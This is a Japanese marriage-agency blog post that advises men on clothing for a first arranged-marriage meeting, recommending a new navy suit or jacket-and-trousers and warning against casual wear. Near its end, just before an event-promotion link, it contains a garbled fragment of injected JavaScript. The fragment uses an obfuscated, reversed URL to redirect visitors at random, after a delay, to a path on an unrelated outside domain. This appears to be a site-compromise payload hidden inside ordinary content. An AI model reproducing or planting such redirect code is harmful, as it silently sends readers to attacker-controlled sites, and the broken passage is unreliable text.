失敗しない!お見合い時の心得 準備編① 男性の服装

失敗しない!お見合い時の心得 準備編① 男性の服装

協会カウンセラーの佐田です。

暦も10月に入り、いよいよ2021年も終わりが見えてきました。
皆様の婚活は如何でしょうか?
これから気温も涼しくなってくるのかなと思いますし、緊急事態宣言も解除となりましたので、 一層婚活に励む事ができるのでないかと思います。

さて、今回は「失敗しない!お見合い時の心得」という事で、準備するものから、お見合い時のマナー等を何回かに分けて、ご紹介していこうと思います。
これから初めてのお見合いという会員の方や、お見合いは出来るけど、どうも仮交際まで進まないという方のために、ちょっとしたアドバイスとなれば幸いです。

まず1回目は「準備編(男性)」です。
お見合いが決まったら、まずは当日失敗しないように事前準備をする必要があります。

準備するものは、当然当日来ていく服装や、お見合いをする場所、交通手段/時間の確認があります。
これらのうち1つでもいい加減にしてしまうと、それだけでお見合いが不成立にもなりかねません。
しかし、中でも最も重要なものは、やはり当日の「服装」です。
これをいい加減にしてしまうと、その時点でお見合いは失敗になりますので、そうならないようにどのように準備していくのか見ていきましょう。

当日の服装は決して手を抜かない!

お見合い当日、どんな服装をしていけば良いのだろう?とお悩みの方、結構いらっしゃると思います。
先程言いましたが、当日の服装をいい加減にしてしまうと、ほぼ間違いなくお見合い失敗になります。
これは男女共に共通しており、服装デザインはさておき、いい加減にするのはNGです。

これは以前女性会員から伺った話ですが、初めてのお見合いでお相手とお会いした際、お相手の男性が ヨレヨレのシャツや、普段着のようなズボンで来ていた事があり、それを見た瞬間あまりにも悲しくて泣きなくなりましたと話してくれました。

それもそうですよね、
将来のパートナーとなるかもしれないお相手と初めて会うので、自分は一生懸命服装やお化粧もして準備をしてきたのに、 お相手はそんなヨレヨレの服装で来られたら、自分の事なんてどうでも良いのかと思ってしまいますよね。
ここでがっかりしてしまったら、以降どれだけ面白い話を男性がされても、一切お見合い成功にはなりません。

逆の立場でも同様です。男性が事前に一生懸命準備して待っていたら、お相手の女性がまったくお化粧もせずに、 Tシャツとデニムパンツのような普段着で来られたら、がっかりしてしまいます。

恋愛やお見合いに問わず、初めての人に会う際には、第一印象が非常に重要です。
仮交際へ進むかのカギは、第一印象にかかっておりますので、決して手を抜かないようにしましょう。

ではどのような服装にしていくのが良いのでしょう?

スーツは新調する!

男性は、やはりジャケット&パンツ(通称ジャケパン)か、スーツが良いです。
スーツは、カジュアルな服装とは違い、知的に見えて、頼もしい印象を与えてくれます。
当日どのような服装にすれば良いか分からない場合は、スーツを選んだ方が普段お仕事でも使用しているので選びやすいですし、お見合い用ファッションとしては鉄板ですので、無難です。

ただし、ここで注意して頂きたいのが、普段お仕事で使用しているスーツをそのまま来ていくと、 スーツがヨレていたり、昔購入したものなので、サイズが合っていない場合があります。
やはり、将来のパートナーとなるかもしれないお相手と初めて会おうというわけですから、 出来れば、今のサイズにフィットしたスーツを婚活用として新調する事をオススメします。

また、普段お仕事で使用しているスーツとは違い、婚活用はお相手の女性に気に入ってもらうために 購入しますので、自分の好みで選ぶのではなく、出来れば女性店員さんに見てもらいながら、 ネイビーカラーのスーツを選んだ方が女性受けしやすいです。

ワイシャツやネクタイ、靴も同様に購入する!

婚活用のスーツを新調したら、そのスーツに似合うワイシャツやネクタイ、靴も購入しましょう。
特にネクタイは、女性と向き合った際に、まず目につくものです。
このカラーがスーツに合っていると、清潔感が増して、女性からの好感度が上がっていきます。

同様に靴も新しいスーツに似合うカラーで購入しましょう。
靴はあまり気にならないのでは?と思う男性もいるかもしれませんが、女性は男性の靴をしっかり見ていますので、 靴の手入れは忘れないように。
ワイシャツも新しいのを用意して、しっかりアイロンをかけてよれないようにしましょう。

ジャケパンは、若々しさと爽やかさを意識して!

スーツと同様に人気のコーディネートであるジャケパン。 女性にもとても印象が良い服装ですので、他のスーツを来てくる男性よりも好印象になる可能性があります。
とはいえ、やはりコーディネートが滅茶苦茶ですと、返ってマイナス効果になりますので、カラーやサイズ感は しっかり意識して購入して下さい。

ジャケパンもスーツと同様ですが、自分が良いなというものを購入するのではなく、女性受けが良いものを選んで下さい。
カラーは明るいのが好まれるので、ブラックではなく、ネイビーやライトグレー、ブルーなどがオススメです。

パンツは、ベージュやホワイト、ジャケットと同じカラーなどありますが、選ぶ際には、 出来ればショップの女性店員に見てもらいながら購入した方が、より女性受けしやすいカラーでコーディネート出来ると思います。

ここで注意して頂きたいのが、年齢に合ってないようなカラーやデザインのジャケパンを購入してしまうと、ちぐはぐになり、 マイナスイメージになりますので、年齢に合ったものを忘れないようにしましょう。

スーツも同様ですが、ジャケパンを購入するのに、ブランドものの高いのをわざわざ購入する必要はありません。
ユニクロのジャケットでも、自分に似合ったコーディネートが出来れていれば、女性からの好感は上がります。
大切なのは、清潔感とサイズ感、そして若々しさです。

Tシャツ、デニムパンツなどのラフな恰好はマイナス印象だからNG!

男性ですと、Tシャツやデニムパンツ、冬場ですとジャンバーにデニムパンツなどをいった手軽でラフな恰好をしたくなりますが、 これでお見合いに行くのは本当に止めましょう。
たとえTシャツ、デニムパンツが似合っていて、カッコイイと思われたことがあったとしても、女性はそこを見ているわけではありません。

女性は、一生懸命お見合いのために服装やお化粧を頑張ってきたのに、そんな普段と変わらない恰好で来るという事は、 私の事はどうでも良いと思っている!と感じてしまいます。
ですので、お見合いに行く時には、このお見合いの為に頑張ってきた=お相手との出会いを大切にしているという事を忘れず、 服装にもその努力が垣間見れるように心がけて下さい。

女性は、自分を大切にしてくれる人なのかをしっかり見ている事を忘れずに!

ざっとですが、お見合い準備編として服装選び(男性用)としてご紹介してきました。
ジャケパンの部分でも触れましたが、スーツやジャケパンを購入する時に、ブランドもので固める必要はありません。

大切なのは、自分の体型に合っており、清潔感と若々しさ、爽やかさがある事です。
とはいえ、男性が良いなという服も、女性から見るとイマイチになるものも多いので、婚活用として購入するのであれば、 女性のお知り合いの方、もしくは女性店員に見てもらって選んだ方が、より女性受けしやすい服装になると思います。

こういったお見合いのために、服装を新調し、女性受けしやすいファッションで来ると、女性は私のためにしっかり準備してきてくれたんだなとという事で、好印象を持ってもらえます。

お見合い成功へは不可欠な部分になりますので、面倒とは思わず新しく婚活用として、服装をぜひ準備して下さい。
その努力は、しっかり女性は見てくれていますので。

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to” data-full-width-responsive=”true”>
婚活パーティー続々開催中!

婚活パーティーの開催スケジュールについては、ぜひ当協会婚活イベント情報ページをご確認下さい。

婚活イベント情報を見る